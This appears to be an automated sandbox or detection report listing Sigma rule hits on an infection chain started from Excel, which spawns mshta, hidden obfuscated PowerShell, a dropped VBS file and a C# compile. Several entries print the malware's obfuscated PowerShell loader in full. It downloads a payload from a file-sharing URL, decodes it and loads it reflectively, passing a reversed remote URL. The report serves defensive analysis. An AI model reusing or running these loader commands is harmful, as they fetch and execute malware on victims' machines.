      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lX
NEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFt
      Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZm
ljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFt
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'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'+[CHaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'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
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3620, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3948, ProcessName: mshta.exe
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'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'+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3148, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , ProcessId: 2764, ProcessName: wscript.exe
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFt
      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'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'+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3148, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline", ProcessId: 3328, ProcessName: csc.exe
      Source: Network Connection | Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton | Data: DestinationIp: 152.231.117.86, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3620, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
      Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3148, TargetFilename: C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS
      Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3620, Protocol: tcp, SourceIp: 152.231.117.86, SourceIsIpv6: false, SourcePort: 443
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass 
-NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmoriz
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')", CommandLine: 
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmoriz
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'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'+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3148, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , ProcessId: 2764, ProcessName: wscript.exe
      Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3148, TargetFilename: C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline
      Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3620, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'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'+[CHaR]34+'))')))", CommandLine: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'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
